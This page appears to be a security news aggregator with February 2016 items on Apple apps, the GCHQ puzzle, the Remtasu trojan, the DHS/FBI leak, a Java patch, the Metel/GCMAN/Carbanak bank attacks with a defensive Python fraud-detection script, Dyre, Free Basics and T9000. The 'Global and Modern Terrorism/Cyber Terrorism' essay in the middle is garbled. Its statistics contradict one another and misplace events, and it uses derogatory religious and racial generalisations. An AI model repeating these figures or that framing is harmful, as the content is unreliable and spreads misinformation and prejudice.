Apple debuted on its rival mobile OS platform last year with the launch of Apple Music on Android. iTunes and Safari have already been made available for both Windows and Mac.
Now, the company will soon move more of its mobile applications to Android if comments made by Chief Executive Tim Cook at the recent company-wide event for Apple employees are to be believed.
iMessage App for Android Platform
Cook reportedly told his staff that Apple may soon bring other apps and exclusive services to Android, and added that bringing Apple Music to Android in November was "a way of testing the waters for growing its services division through other platforms," reports 9to5Mac.
So, you could see iMessage, the company's encrypted messaging application, expanded to Android.
iMessage is one of Apple's most popular apps; it allows Apple users to send and receive messages, photos, and videos with fellow Apple users as long as the device has a data connection.
How Apple Can Read End-to-End Encrypted iMessages
Many of us know that iMessage uses end-to-end encryption, so that neither Apple nor anyone else can access or read your messages; what fewer know is that messages backed up to Apple's iCloud service are vulnerable to federal warrants.
With iCloud Backup enabled, copies of all your messages, photographs and other important data stored on your iPhone or iPad are encrypted on iCloud using a key controlled by Apple, not by you.
This allows Apple, and hence anyone who breaks into your account, to read your messages and see your personal and confidential data.
List of Apple Apps you Might See on Android
Besides iMessage, the list of Apple apps that you could see expanded to Android may include iTunes, Music Memos, Apple Maps, and iCloud.
In September, the company released its first-ever Android application, known as Move to iOS, designed to help Android users transfer their content quickly and safely from an Android device to an iOS device.
Although it is still unclear when Apple will make the move, if it does happen, which of your favorite Apple apps would you want to see on your Android device?
Let me know in the comments below.
How to Crack GCHQ Crypto Puzzle? — Here's the Solution
9.2.2016 BigBrothers
GCHQ has finally released the solution to its head-spinning Xmas Puzzle, after all participants failed to reach the final answer.
GCHQ had released a crypto puzzle, dubbed Xmas Puzzle, on 9th December in the form of a Christmas Card that went viral online soon after its release.
Nearly 600,000 people took on the challenge since early December, but only 30,000 reached the final stage.
The puzzle began with a grid-shading nonogram that, once solved, formed a QR code containing a hint for the next stage of challenges.
The later stages of the Xmas Puzzle covered topics such as a web-link maze, word and number puzzles, graph theory and other cipher problems. Some questions also touched on lighter topics like Lord of the Rings, ducks, chess, French, and semaphore.
Who Created Crypto ‘Xmas Puzzle’?
This brain-teasing puzzle was created by a small team of GCHQ cryptographers under GCHQ director Robert Hannigan. The deadline for solvers was January 31st.
Attempts to solve the puzzle created a buzz on online forums like Reddit, where solvers worked on it jointly, a healthy approach to puzzles of this kind.
The Xmas Puzzle helped participants broaden their cryptography knowledge and improve their problem-solving skills.
David MacBryan, 41, from Edinburgh, Wim Hulpia, 40, from Lovendegem in Belgium and US-born Kelley Kirklin, 54, from London, came closest to the fiendish puzzle game.
These three participants have been declared winners by GCHQ and will be rewarded with a GCHQ paperweight and a copy of Bletchley Park codebreaker Alan Turing's biography, signed with a personal message from the GCHQ Director.
Unable to Crack? Here’s the Solution
However, GCHQ announced that none of the participants had completely solved the Xmas Puzzle, and so released the full answer.
"I thought I had solved it, but a news report came out a few days ago saying nobody had … so I went back and had another look and figured out what I missed, but I was too late at that point. But it seems that everyone else missed it as well, and I was joint closest," David MacBryan told the Guardian.
GCHQ said the Xmas puzzle was not a recruitment ploy, as some had initially believed, but added that the winners were welcome to apply for jobs.
The solution to the puzzle, including explanations from the puzzle-setters, is now available for you, so you can now check how many you managed to work out.
Here's the Facebook Hacking Tool that Can Really Hack Accounts, But...
9.2.2016 Social Site
Yes, you heard me right.
A newly discovered Facebook hacking tool actually has the capability to hack a Facebook account, but YOURS, not the one you want to hack.
How to hack a Facebook account? How to hack my girlfriend's Facebook account? My boyfriend is cheating on me, how do I hack his Facebook account?
These are the queries that most of the Internet users search on Google.
But beware! If you come across any Facebook hacking tool that promises to help you hack your friends' Facebook accounts, you may end up downloading a hacking tool that hacks you instead of them.
Facebook Hacking Tool that Can Really Hack, But Your Accounts
Dubbed Remtasu, the tool markets itself as a Facebook hacking tool but is actually a Windows-based Trojan that has spread globally over the past year and now disguises itself as an app for obtaining people's Facebook account credentials.
The tool contains a Keylogger that can capture all your keystrokes and store them in a file that is subsequently sent to the attacker's server.
The malicious Facebook hacking tool is exploiting "the constant desire of a lot of users to take control of accounts from this well-known social network," according to a Monday blog post by IT security company ESET.
How Remtasu Works:
The malicious tool is delivered via direct download websites.
Once a user visits one of these websites, the Win32/Remtasu.Y malware is automatically downloaded and executed on the victim's machine and hides itself among other files.
Remtasu has the capability to:
Open and obtain information from the clipboard.
Capture keystrokes.
Store all the data in a file which is subsequently sent to an FTP server.
The worst part is yet to come:
The malware remains on the infected computer even when the victim reboots their system or attempts to find the malware threat in the list of active processes.
"In this case, the malware replicates itself, saving the copy in a folder that it also creates within the system32 folder," reads the post. "The new InstallDir folder remains hidden inside the system files, making it difficult for users to access."
The most affected countries include Colombia, Turkey and Thailand. In the past, Remtasu was distributed through malicious files attached to phishing emails purporting to be from legitimate government or business organisations.
Hacker Leaks Info of 30,000 FBI and DHS Employees
9.2.2016 Hacking
An unknown hacker who promised to release the personal information of government employees has dumped online a list of nearly 20,000 Federal Bureau of Investigation (FBI) agents and 9,000 Department of Homeland Security (DHS) officers.
Though the authenticity of the information has not been verified, at least, some of the leaked data appears to be legitimate.
Here's What the Hacker Leaked:
The hacker leaked the first round of data, belonging to roughly 9,000 DHS employees, on Sunday, followed by the release of information on 20,000 FBI agents on Monday.
The hacker, who goes by the Twitter username @DotGovs, published the supposed data on an encrypted text-sharing website, including:
Names
Job titles
Phone numbers
Email addresses
The Reason Behind the Hack
The message at the top of the data dump includes the hashtag "#FreePalestine" and reads "Long Live Palestine, Long Live Gaza: This is for Palestine, Ramallah, West Bank, Gaza, This is for the child that is searching for an answer."
The above message shows support for Palestine, which could be the motivation behind the hack.
Although it's unclear how much of the hacked data may have been publicly available, the hacker told Motherboard that he had downloaded 200GB of data, out of 1TB total available to him.
If true, the information leaked so far would be only a small fraction of what the hacker holds.
How the Hacker Did It
The hacker claimed to have compromised a US Department of Justice (DoJ) email account and gained access to the department's intranet. He then allegedly downloaded the information of over 20,000 FBI officers, roughly 9,000 DHS employees and an undisclosed number of DoJ staffers.
The hacker also claimed to have some military emails and credit card numbers belonging to federal employees but provided neither proof nor indication that he intended to release them too.
In October, a teenage hacker who goes by "Cracka" carried out a similar hack and targeted several high-profile government employees, including the CIA director John Brennan, the US spy chief James Clapper, the FBI Deputy Director Mark Giuliano, and others.
However, not all hacks are as vast and serious as that of the US Office of Personnel Management (OPM), in which over 21.5 Million government employees were exposed.
DoJ Downplayed the Impact of Hacking
"This unauthorized access is still under investigation; however, there is no indication at this time that there is any breach of sensitive personally identifiable information," a DOJ spokesman said in a statement to the Guardian.
The hacked data, posted anonymously on the encrypted Cryptobin website, was reviewed by the Guardian, which found that some of the data from the DHS list is outdated, and some listed individuals have not worked for DHS in years.
Others are criticizing the US government for its failure to protect its sensitive data, especially after the embarrassing and damaging OPM hack that exposed personal details on millions of government employees.
Global and Modern Terrorism/Cyber Terrorism
9.2.2016 Hacking
In the following brief I will describe kinetic-plot-based modern terrorism/cyber-terrorism and religious affiliations, both Jihadist and non-Jihadist, as well as organized crime associations, with data and statistics to show that Radical Muslim Terrorism is the most prominent form in America today.
Modern terrorism and cyberterrorism display the use of violence and threats to intimidate or coerce, normally for political purposes. The state of fear and submission produced by terrorism is known as terrorization. Both are found underlying in espionage, targeted penetrated breaches and kinetic plots. I will outline and compare the plots based on past history.
A brief history according to James Clapper, Director of National Intelligence; in 2011 alone there were over 13,000 reported attacks. This is a 45-year period of data collection, in which 288 plots led to 611 arrests. In 2016, there were a total of 75 people arrested in 43 plots.
From January 2015 to December of 2015 there were 23 plots of Cyber Terrorism reported and 43 people arrested in 189 plots of terrorism with 454 arrests. Out of 44 plots like Boston, where a kinetic plot was tried and successful; Salafist plots totaled 99%, Non-Jihadist- 3% 14 are Jihadist and led to between 900-1,000 active investigations. Out of 35 plots 70% led to arrest. Out of the targets most are Islamic Driven by Terrorist Radicalization noted by James Comey FBI Director.
Here are some results of terrorism related events following 9/11 and the window of opportunity that it created. There were 288 plots following 9/11 and 170 of those were kinetic plots on the homeland. A whopping 59% of these plots led to arrest.
The Islamic extremists plots equaled 90%, 86 were Jihadist and led to 167 investigations. Out of the 167 investigations 8 were successful plots that reached fruition. Out of the 167 investigated, 78 were interdicted, resulting in 37 murders, and 49 injuries. The Islamic state produced 10-11% splinter groups, 5% women, and 7% bad girls.
In regard to Non-Islamic there were 84 plots resulting in 228 investigations. Out of the 228, 25 kinetic plots on the homeland were successful. There were a total of 59 plots interdicted resulting in 77 deaths and 60 injuries caused by crazy white people.
Official ISIS/ISIL terrorism involved 76 plots from 2014-2016. ISIS produced 60% of these and 18 were on US soil. 26 of these attacks produced violence and 26 were kinetic plots. 14% of total attacks originated from ISIS. One example is Emanuel Luthchman, who tried to capture, bomb, and behead Merchants Grill patrons on New Year’s in New York in the name of ISIS. In addition, 4 marines were killed in Tennessee by ISIS-bred Shiite prisoners and 14 were recently slain in the San Bernardino attacks, which were insider attacks.
Global terrorism is on the rise in greater numbers than on US soil: 17 were killed in the Paris attack. 21 Coptic Christians were murdered on the Libyan coast. In Tunisia, 137 were killed in a Yemen mosque. In Kuwait, 39 French and Tunisians were killed at a beach resort. Another 27 were killed in Shiite mosques, and many others remain unreported.
On US soil, 4 marines were killed in Tennessee; in Akron, OH, Terrence Joseph McNeil plotted to kill 100 US service members; and a terrorist stabbed 5 in Mencer, CA.
In the federal spectrum, breaches of government contracts and the private sector are on the rise. Economic espionage increased at an alarming rate from 1945-2010. There were 200 arrests made, 90 in the Washington DC metro area and 40% in New York State. Many of these attacks resulted in economic loss attributed to the Chinese. There were 4 confirmed plots in California in 2015. Internationally there were 3 major plots, resulting in a total of 9 indictments focused on technology transfer of government trade secrets and on corporate espionage.
This is becoming more and more of the normal trend, instead of the old fashioned classic terrorism through traditional bombings. This modern day terrorism is focused on intellectual theft, theft of personally identifiable information that could lead to easy coercing and manipulation of the person in control of the property. It is focused on theft of trade secrets from the inside out; corporate cyber espionage.
Insider attack history includes the terrorist attacks on London in 2005 which came from their own British Citizens. The Boston Marathon attack was carried out by US citizens and the Paris attacks by French Citizens.
US Cyber Command Commander Admiral Mike Rogers noted that the breach of 22 million records from OPM was simply a part of China’s huge data spying ring from Beijing. The records collected were of those with extensive background checks related to (TSSCI) Top Secret Compartmented Information security clearances. This data will likely lead to identification of spies in China and interruption of their activities.
Big data analytics make it possible for large volumes of stolen data to be scanned for vital information such as personally identifiable information. PII consists of health, medical, dental, birth, marriage and death records, leading to threats or coercion of next of kin or blood relatives.
Pertinent PII, such as Social Security numbers, mother’s maiden name and health records, can be used from an intelligence perspective to gain life details about the individuals concerned, or for social engineering and manipulation of that data to alter the individual’s original identity and recruit them as a double agent or dual spy.
In an attempt to protect the persons identified in the breach, OPM has transferred the personal data on cleared individuals to the Pentagon, which will take over monitoring and background checks to create a secure environment for future individual data security. The annual fiscal cost is estimated at $600,000.00.
In contrast (then and now), the recent crossover to cyber espionage and global terrorism manifests itself in "going dark". Other terms are rogue and under the radar, through hidden applications and data. These new tactics use apps that can be downloaded to a cell phone and cannot be traced by government authorities. Espionage-related actions totaled 781 over a span of 20 years, of which 565 or 21% were Russian and 155 cases were confirmed China-based espionage, with many cases diverted through proxy hopping.
The Government cannot gain access to the encrypted communications in applications such as WhatsApp, Snap Chat, Confide, and Signal, just to name a few. The latest encryption methods disappear in a matter of seconds after the message is displayed preventing duplication of said message.
Some popular platforms are gaming platforms, which can be used to send encrypted messages under false names. These are used to send and receive plots and plans for attacks. Other targets of cyber espionage and hacking are personally identifiable information (PII) gathered through social media such as Twitter, LinkedIn, Facebook, and Dark Mafia, to collect intelligence and/or compromise personal data.
In comparison, modern terrorism and cyber terrorism have manifested themselves primarily through Islamic radical terrorism in various forms. It comes under many names and various headings. The primary target is to kill the infidel (anyone not bowing to the name of Allah). Oftentimes the youth and the weak are recruited as targets by ISIS and ISIL because of their desire to fit in and a need to be part of something. They are targeted to convert to Islam and radicalized via the internet.
In summary, terrorism and modern cyber terrorism will not go away. This is history repeating itself. Just as many years ago Protestants fought against Catholics, now Christians fight Muslims. In 2014, 2.6% of terrorism victims lived in Western countries. This is likely to get worse before it gets better. There is no one easy way to combat terrorism, as you see it now comes in your handset, your headset, at your fingertips. Be wise with your choices, as it may come knocking at your door.
CVE-2016-0603 – Oracle Issues out-of-band Java emergency patch for Windows
8.2.2016 Vulnerebility
Oracle issued an out-of-band emergency patch for the Java platform running on Windows machines that fixes the critical vulnerability tracked as CVE-2016-0603.
Oracle issued an out-of-band emergency patch for Java software running on Windows systems that fixes a critical vulnerability tracked as CVE-2016-0603. The vulnerability could be exploited by an attacker who tricks users into visiting a malicious website and downloading files to the target system before installing Java 6, 7 or 8.
Oracle hasn’t provided much information on the vulnerability; the flaw has received a CVSS Base Score of 7.6.
“Oracle just released Security Alert CVE-2016-0603 to address a vulnerability that can be exploited when installing Java 6, 7 or 8 on the Windows platform. This vulnerability has received a CVSS Base Score of 7.6.” states the security advisory published by Oracle. “To be successfully exploited, this vulnerability requires that an unsuspecting user be tricked into visiting a malicious web site and download files to the user’s system before installing Java 6, 7 or 8. Though considered relatively complex to exploit, this vulnerability may result, if successfully exploited, in a complete compromise of the unsuspecting user’s system.
As explained by Oracle, the successful exploitation of the CVE-2016-0603 flaw could result in “complete compromise” of the target machine.
Users are exposed to the attack only during the Java installation phase; for this reason they have no need to upgrade an existing Java installation, but they should take care if they hold old Java installers prior to 6u113, 7u97 or 8u73 and intend to install them. In that scenario, they should instead download the latest Java releases, 6u113, 7u97 or 8u73 or later.
Below is the list of affected product releases:
“Because the exposure exists only during the installation process, users need not upgrade existing Java installations to address the vulnerability. However, Java users who have downloaded any old version of Java prior to 6u113, 7u97 or 8u73, should discard these old downloads and replace them with 6u113, 7u97 or 8u73 or later.” continues the post.
Oracle recommends users to ensure that they are running the most recent version of Java SE and that all older releases of the software have been completely removed. Oracle further advises against downloading Java from sites other than Java.com as these sites may be malicious.
Another suggestion is to download Java software only from the official Java.com website to avoid ugly surprises.
APT-style bank robberies increase with Metel, GCMAN and Carbanak 2.0 attacks
8.2.2016 Source: Kaspersky APT
In late 2014, Kaspersky Lab researchers made a worrying prediction: financially-motivated cyber-criminals would adopt sophisticated tactics and techniques from APT groups for use in bank robberies.
Just a few months later, in February 2015, we announced the discovery of Carbanak, a cyber-criminal gang that used custom malware and APT techniques to steal millions of dollars while infecting hundreds of financial institutions in at least 30 countries.
Since then, we have seen an increase in these covert, APT-style attacks that combine the use of reconnaissance, social engineering, specialized malware, lateral movement tools and long-term persistence to steal money from financial institutions (particularly ATMs and money transfer systems).
Today at the Security Analyst Summit (SAS 2016), Kaspersky Lab is announcing the discovery of two new gangs engaged in APT-style bank robberies – Metel and GCMAN – and the reemergence of the Carbanak group with new targets in its sights.
In 2015, Kaspersky Lab researchers conducted Incident Response for 29 organizations located in Russia and infected by these three groups.
Due to the active nature of law enforcement investigations and non-disclosure agreements with victim organizations, Kaspersky Lab cannot provide extensive details of the attacks. Kaspersky Lab is releasing crucial Indicators of Compromise (IOC) and other data to help organizations search for traces of these attack groups in their corporate networks (see below).
The story of Metel – ATM balance rollbacks
In summer 2015, a bank in Russia discovered it had lost millions of rubles in a single night through a series of strange financial transactions. The bank’s clients were making withdrawals from ATMs belonging to other banks and were able to cash out huge sums of money while their balances remained untouched. The victim bank didn’t realize this until it tried to recoup the money withdrawn from the other banks’ ATMs.
During our incident response, we discovered the solution to this puzzle: Metel, a modular malware program also known as Corkow.
The malware, used exclusively by the Metel group, infected the bank’s corporate network via e-mail and moved laterally to gain access to the computers within the bank’s IT systems.
Having gained access to the bank operator’s money-processing system, the gang pulled off a clever trick by automating the rollback of ATM transactions. This meant that money could be stolen from ATM machines via debit cards while the balance on the cards remained the same, allowing for multiple transactions at different ATM machines.
Encrypted configuration for Metel malware plugins
Our investigations revealed that the attackers drove around several cities in Russia, stealing money from ATMs belonging to different banks. With the automated rollback in place the money was instantly returned to the account after the cash had been dispensed from the ATM. The group worked exclusively at night, emptying ATM cassettes at several locations.
In all, we discovered Metel in more than 30 financial institutions, but Kaspersky Lab’s incident responders were able to clean the networks before any major damage could be done. It is highly likely that this threat is far more widespread and we urge financial institutions around the world to scan their networks for signs of the Metel malware.
The Metel criminal group is still active. At the moment, we don’t have any information about any victims outside Russia.
GCMAN – penetration testing tools gone bad
A second group, which we call GCMAN because the malware is based on code compiled on the GCC compiler, emerged recently using similar techniques to the Metel Group to infect banking institutions and attempt to transfer money to e-currency services.
The initial infection mechanism is spear-phishing of financial institution targets with e-mails carrying a malicious RAR archive. Upon opening the RAR archive, an executable is started instead of a Microsoft Word document, resulting in infection.
Once inside the network, the GCMAN group uses legitimate and penetration testing tools such as Putty, VNC, and Meterpreter for lateral movement. Our investigation revealed an attack where the group then planted a cron script into the bank’s server, sending financial transactions at the rate of $200 per minute. A time-based scheduler was invoking the script every minute to post new transactions directly to the upstream payment processing system. This allowed the group to transfer money to multiple e-currency services without these transactions being reported to any system inside the bank.
Decompiled code of GCMAN malware that is responsible for connecting to CnC
In a stroke of luck, the financial institutions discovered the suspicious activity on their network in time to neutralize the threat and cancel the transactions.
One interesting observation is that the real attack happened approximately 18 months before it was discovered. The group used an MS SQL injection in commercial software running on one of the bank’s public web services, and about a year and a half later they came back to cash out. During that time they poked 70 internal hosts and compromised 56 accounts, making their way in from 139 attack sources (TOR and compromised home routers).
We discovered that about two months before the incident someone was trying different passwords for an admin account on a banking server. They were really persistent but doing it only three times a week and then only on Saturdays, in an effort to stay under the radar.
Kaspersky Lab’s research team responded to three financial institutions in Russia that were infected with the GCMAN malware. It is likely that this threat is far more widespread and we urge banks to sweep their networks for signs of this cyber-criminal group.
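Two detection heuristics for the behaviours described above, Metel's automated ATM-withdrawal rollbacks and GCMAN's scheduler-driven $200-per-minute transfers, as an added example that is not Kaspersky's code; the journal layout, field names and sample records are constructed, and real deployments would run these over a sliding window of the bank's own transaction feed.

```python
"""Heuristics for two bank-fraud patterns: withdrawals that are rolled back
seconds after cash is dispensed (Metel) and metronome-regular transfers of a
fixed amount to one destination (GCMAN cron script). Constructed data."""
from collections import defaultdict
from datetime import datetime, timedelta
from statistics import mean


def ts(s):
    return datetime.strptime(s, "%Y-%m-%d %H:%M:%S")


# Constructed card journal: (time, card, atm, type, amount).
# "withdraw" = cash dispensed at an ATM, "reverse" = transaction rolled back.
CARD_JOURNAL = [
    (ts("2015-07-11 01:02:10"), "card-A", "atm-17", "withdraw", 40000),
    (ts("2015-07-11 01:02:12"), "card-A", "atm-17", "reverse", 40000),
    (ts("2015-07-11 01:31:05"), "card-A", "atm-42", "withdraw", 40000),
    (ts("2015-07-11 01:31:07"), "card-A", "atm-42", "reverse", 40000),
    (ts("2015-07-11 02:10:44"), "card-A", "atm-09", "withdraw", 40000),
    (ts("2015-07-11 02:10:46"), "card-A", "atm-09", "reverse", 40000),
    # Ordinary customer: one withdrawal, never reversed.
    (ts("2015-07-11 09:15:00"), "card-B", "atm-17", "withdraw", 5000),
    # Ordinary single reversal (e.g. the ATM failed to dispense).
    (ts("2015-07-11 10:00:00"), "card-C", "atm-03", "withdraw", 3000),
    (ts("2015-07-11 10:00:30"), "card-C", "atm-03", "reverse", 3000),
]


def find_rollback_abuse(journal, min_pairs=3, min_atms=2,
                        max_gap=timedelta(minutes=5)):
    """Return {card: cash_dispensed} for cards whose withdrawals are repeatedly
    reversed shortly after the cash left the ATM, across several ATMs. A card
    balance that never moves while cassettes empty is exactly Metel's trick."""
    by_card = defaultdict(list)
    for rec in sorted(journal):
        by_card[rec[1]].append(rec)
    flagged = {}
    for card, recs in by_card.items():
        pending = {}  # atm -> (time, amount) of a withdrawal awaiting reversal
        pairs, atms, dispensed = 0, set(), 0
        for t, _, atm, kind, amount in recs:
            if kind == "withdraw":
                pending[atm] = (t, amount)
            elif kind == "reverse" and atm in pending:
                wt, wa = pending.pop(atm)
                if wa == amount and t - wt <= max_gap:
                    pairs += 1
                    atms.add(atm)
                    dispensed += amount
        if pairs >= min_pairs and len(atms) >= min_atms:
            flagged[card] = dispensed
    return flagged


# Constructed outbound transfer log: (time, destination, amount).
# Eight $200 transfers exactly one minute apart mimic the cron script.
TRANSFERS = [
    (ts("2015-08-01 03:00:00") + timedelta(minutes=i), "ewallet-777", 200)
    for i in range(8)
] + [
    (ts("2015-08-01 03:02:30"), "supplier-12", 15400),
    (ts("2015-08-01 11:45:10"), "payroll-1", 200),
    (ts("2015-08-03 11:45:10"), "payroll-1", 200),
]


def find_metronome_transfers(transfers, min_count=5,
                             max_jitter=timedelta(seconds=5)):
    """Return {destination: (count, mean_interval_seconds)} for destinations
    receiving a run of identical-amount transfers at a near-constant interval,
    the signature of a scheduler posting transactions rather than a human."""
    by_dest = defaultdict(list)
    for t, dest, amount in sorted(transfers):
        by_dest[dest].append((t, amount))
    flagged = {}
    for dest, recs in by_dest.items():
        if len(recs) < min_count:
            continue
        amounts = {a for _, a in recs}
        gaps = [(recs[i + 1][0] - recs[i][0]).total_seconds()
                for i in range(len(recs) - 1)]
        if len(amounts) == 1 and max(gaps) - min(gaps) <= max_jitter.total_seconds():
            flagged[dest] = (len(recs), mean(gaps))
    return flagged


if __name__ == "__main__":
    print("rollback abuse:", find_rollback_abuse(CARD_JOURNAL))
    print("metronome transfers:", find_metronome_transfers(TRANSFERS))
```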
Carbanak 2.0: new targets beyond banks
After our exposure of the Carbanak group exactly a year ago, the group disappeared for about five months, leading us to believe that the operation was disbanded. However, in September last year, our friends at CSIS published a blog detailing a new Carbanak variant affecting one of its customers.
In December 2015, we confirmed that the group was still active. Kaspersky Lab discovered signs of Carbanak in two institutions – a telecommunications company and a financial institution.
Executable files found in SHIM during Carbanak incident response
One interesting characteristic of Carbanak 2.0 is a different victim profile. The group has moved beyond banks and is now targeting the budgeting and accounting departments in any organization of interest to them, using the same APT-style tools and techniques.
In one remarkable case, the Carbanak 2.0 gang used its access to a financial institution that stores information about shareholders to change the ownership details of a large company. The information was modified to name a money mule as a shareholder of the company, displaying their IDs. It’s unclear how they wanted to make use of this information in future.
Kaspersky Lab products successfully detect and block the malware used by the Carbanak 2.0, Metel and GCMAN threat actors with the following detection names:
Trojan-Dropper.Win32.Metel
Backdoor.Win32.Metel
Trojan-Banker.Win32.Metel
Backdoor.Win32.GCMan
Backdoor.Win64.GCMan
Trojan-Downloader.Win32.GCMan
Trojan-Downloader.Win32.Carbanak
Backdoor.Win32.Carbanak
Kaspersky Lab urges all organizations to carefully scan their networks for the presence of Carbanak, Metel and GCMAN and, if detected, to disinfect their systems/computers/networks and report the intrusion to law enforcement.
All this information has been made available to customers of our APT intelligence reporting service and they received the indicators of compromise and context information as soon as they became available.
Oracle Issues Emergency Java Update for Windows
8.2.2016 Vulnerebility
The US-based software maker Oracle delivered an unusual out-of-band emergency patch for Java to fix a flaw in the Java installer on Windows.
Successful exploitation of the critical vulnerability, assigned CVE-2016-0603, requires an attacker to trick an unsuspecting user into visiting a malicious website and downloading files to the victim's system before the user installs Java 6, 7 or 8.
Although the vulnerability is considered relatively complex to exploit, a successful attack results in "complete compromise" of the target's machine.
What You Need to Know About the Java Exploit
A successful attack requires the attacker to trick an unsuspecting user into running a Java installer obtained somewhere other than the official Java website.
Since the flaw exists only during the installation process, users do not need to upgrade their existing Java installations to address the vulnerability.
"However, Java users who have downloaded any old version of Java before 6u113, 7u97 or 8u73, should discard these old downloads and replace them with 6u113, 7u97 or 8u73 or later," says Eric Maurice, Oracle security blogger.
Patch Now! Java Update Released
Few details about the flaw are known yet, and Oracle has not provided any public information on the nature of the vulnerability.
However, due to the threat posed by a successful attack, we strongly recommend customers to apply the emergency patch as soon as possible.
Hackers behind Dyre Malware Busted in Police Raid
8.2.2016 Virus
The world's most notorious financial hacking operation was disrupted by Russian authorities in November, when they raided offices associated with a Moscow-based film and production company named 25th Floor.
According to the Russian authorities, 25th Floor was allegedly involved in distributing the notorious password-stealing malware known as Dyre Banking Trojan.
Malware Costs Hundreds of Millions of Dollars in Losses
The Dyre banking Trojan was typically distributed via spam campaigns and was responsible for hundreds of millions of dollars in losses at banking and financial institutions, including Bank of America Corp, PayPal, and JPMorgan Chase & Co.
Dyre, also known as Dyreza, first appeared in July 2014 and was later updated to target Windows 10 systems and the new Edge browser.
However, Dyre has not been in use since the November raid, according to cyber security experts, who said the raid represents Russia's biggest effort to date in cracking down on cyber crime.
It is not yet known whether the Russian authorities have arrested or charged anyone in connection with the raid.
However, the sources familiar with the matter told Reuters that the Dyre investigation was aided by security firm Kaspersky Lab that would reveal details about the case at its annual conference for security experts starting Sunday.
The malware authors used a variety of techniques to deliver Dyre into victims' web browsers in order to alter the communication between customers and more than 400 financial institutions.
They Are Producing a Cyber-Crime Thriller Movie: BOTNET
The name that came out of the November raid was 25th Floor, a company that distributes movies and television shows in Russia and other Eastern European and Near Eastern countries.
The company is currently producing a film called BOTNET, a cyber crime thriller based on a 2010 case in which 37 people from the United States and other countries were charged over a $3 million scam.
25th Floor hired Moscow-based computer security company Group-IB to advise the Botnet director and writers on the detailed aspects of cybercrime, said Group-IB CEO Ilya Sachkov. He said he was initially approached by Nikolay Volchkov, the CEO of 25th Floor.
Then Sachkov got an urgent call from Volchkov last November, saying he needed to meet.
"He was afraid. His color was totally white," added Sachkov. "He knows there's an ongoing investigation about cybercrime."
To know how the Dyre banking malware works and how you can protect yourself against the malware, you can read this The Hacker News article.
Breaking — India Bans Facebook's Free Basics Service
8.2.2016 Social Site
Facebook's Free Basics Internet service has been blocked in India.
The Telecom Regulatory Authority of India (TRAI) has banned mobile carriers and broadband providers from charging customers based on what services or content they access over the Internet.
Under Prohibition of Discriminatory Tariffs for Data Services Regulations, 2016, "no service provider shall offer or charge discriminatory tariffs for data services on the basis of content."
With this, Facebook's Free Basics is dead in India.
All Zero-Rated Internet Services are BLOCKED!
It is not just Facebook's Free Basics Internet program that has been blocked inside the country, but also the zero-rated internet services altogether.
Zero-rated internet services are those that allow people to access some websites and web services without using any of their mobile data allowance. Under the new regulation, no such services are allowed.
Free Basics (previously known as Internet.org) is a Facebook service that offers people free access to more than three dozen web services hosted on its platform.
Subscribers of the Free Basics app must be on the Reliance mobile network and are limited to a range of portals including Wikipedia, BBC News, AccuWeather, Bing, and various health websites, and of course, Facebook and Facebook Messenger.
Free Basics Vs. Net Neutrality
Since its launch, Free Basics has been a controversial subject in the country because it violates Net Neutrality principles.
Net Neutrality advocates argued that by offering some websites and services for free, people are discouraged from visiting other sites. Facebook's Free Basics gives a huge advantage to the sites and services it includes.
For example, if Free Basics includes Facebook Messenger for free access, no other instant messaging app would be able to grow in this competitive market, and that is nothing less than a violation of Net Neutrality.
The telecom regulator had previously ordered Reliance Communications to temporarily suspend Free Basics until the regulator had reached a decision on rules for differential data tariffs.
Facebook has been contacted for comment on the new regulation in India, the second most populous country in the world. We'll update this article when we hear Facebook's response.
Hackers leaked DHS staff records, 200GB of files are in their hands
8.2.2016 Hacking
A hacker accessed an employee’s email account at the Department of Justice and stole 200GB of files including records of 9,000 DHS staffers and 20,000 FBI employees.
Yesterday, data from a Department of Homeland Security (DHS) staff directory was leaked online; a Twitter account shared a link to an archive containing 9,355 names.
The person responsible for the leak first contacted Motherboard to share the archive.
Each record of the DHS Staff Directory includes name, title, email address, and phone number.
A closer look at the archive shows that it includes DHS security specialists, program analysts, InfoSec and IT staff, and also 100 employees with the title “Intelligence”.
The same Twitter account later announced the imminent release of an additional data dump containing 20,000 FBI employees.
Are the records authentic?
Motherboard, which obtained the archive, called the FBI operations center, and in one case the individual who picked up the phone introduced himself with the same name associated with that number in the archive. The same happened with a DHS employee, so Motherboard concluded that the information is legitimate.
Which is the source of data?
According to Motherboard, a hacker accessed an employee’s email account at the Department of Justice. As proof, the hacker sent the email message to Motherboard’s contributor Joseph Cox directly from the compromised account.
“A hacker, who wishes to remain anonymous, plans to dump the apparent names, job titles, email addresses and phone numbers of over 20,000 supposed Federal Bureau of Investigation (FBI) employees, as well as over 9,000 alleged Department of Homeland Security (DHS) employees, Motherboard has learned.” wrote Cox in a blog post.
“The hacker also claims to have downloaded hundreds of gigabytes of data from a Department of Justice (DOJ) computer, although that data has not been published.”
The hacker first tried to use the compromised credentials to access a DOJ staff portal, without success; he then called the department directly and obtained access through social engineering.
The hacker accessed the DoJ intranet where the database is hosted and downloaded part of the roughly 1TB he had access to.
“I HAD access to it, I couldn’t take all of the 1TB,” the hacker told Motherboard.
The hacker confirmed his intention to release the rest of the data in the near future.
What is the motivation behind the attack?
It is not clear at the moment why the hacker released the archive, but it does not appear to be financially motivated. The hacker left only the following message when leaking the data:
“This is for Palestine, Ramallah, West Bank, Gaza, This is for the child that is searching for an answer…”, which are verses of “Long Live Palestine”.
The only certainty right now is that similar incidents are becoming too frequent; apparently government staff are not properly trained on the main cyber threats and hacking techniques. Such incidents show a lack of awareness of the most basic security measures.
Whenever a hacker leaks such sensitive data, I wonder how many of his peers had access to the same information with the intent to use it in other attacks or to resell it, perhaps to a foreign government.
T9000 backdoor, a sophisticated malware that spies on Skype users
8.2.2016 Virus
The T9000 backdoor discovered by Palo Alto Networks infects victims’ machines to steal files, take screengrabs, and record Skype conversations.
A new threat is targeting Skype users: a backdoor trojan dubbed T9000 that infects a victim’s machine to steal files, take screengrabs, and record conversations. The T9000 backdoor was spotted by researchers at Palo Alto Networks and appears to be a hybrid variant of another malware family, dubbed T5000, that was detected in the wild two years ago.
“In addition to the basic functionality all backdoors provide, T9000 allows the attacker to capture encrypted data, take screenshots of specific applications and specifically target Skype users. The malware goes to great lengths to identify a total of 24 potential security products that may be running on a system and customizes its installation mechanism to specifically evade those that are installed.” states a blog post published by Palo Alto Networks.
T9000 was used by threat actors to target organizations worldwide; the researchers observed it in multiple targeted attacks against US organizations.
The backdoor uses a multistage execution flow, which starts when the victim opens an RTF file containing exploits for two specific vulnerabilities (CVE-2012-1856 and CVE-2015-1641).
